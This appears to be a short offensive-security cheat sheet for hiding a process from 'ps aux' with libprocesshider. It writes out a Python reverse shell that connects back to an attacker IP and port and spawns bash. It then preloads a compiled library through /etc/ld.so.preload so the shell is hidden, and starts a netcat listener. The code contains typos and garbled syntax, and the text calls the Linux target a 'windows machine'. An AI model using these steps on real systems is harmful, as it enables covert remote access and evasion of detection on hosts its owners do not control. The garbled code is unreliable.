General
GOAL ---> Hide process from ps aux
Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.
Important
- Can only hide one process at the time
Commands
The reposity need to be cloned on the target (windows machine)
Download the reposity (Target)
git clone https://github.com/gianlucaborello/libprocesshider.git
Create reverse shell and compile the code (Target)
# Create a rever shell (reverse_shell.py)
nano reverse_shell.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",PORT))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run([*/bin/bash","-i*])
# Give chmod permission
chmod +x reverse_shell.py
# Edit processhider.c
nano processhider.c
- Change the script name of the python code for your evil code
- Save
# Compile the code in the direcotry
USER@sid:~/libprocesshider$ make
'---> This will create libprocesshider.so
# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/
# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Launch the reverse_shell
./reverse_shell.py
Netcat Lisener (Attacking)
nc -lvnp PORT
The process should now be hiden
More Information
More information ---> https://github.com/gianlucaborello/libprocesshider (opens in a new tab)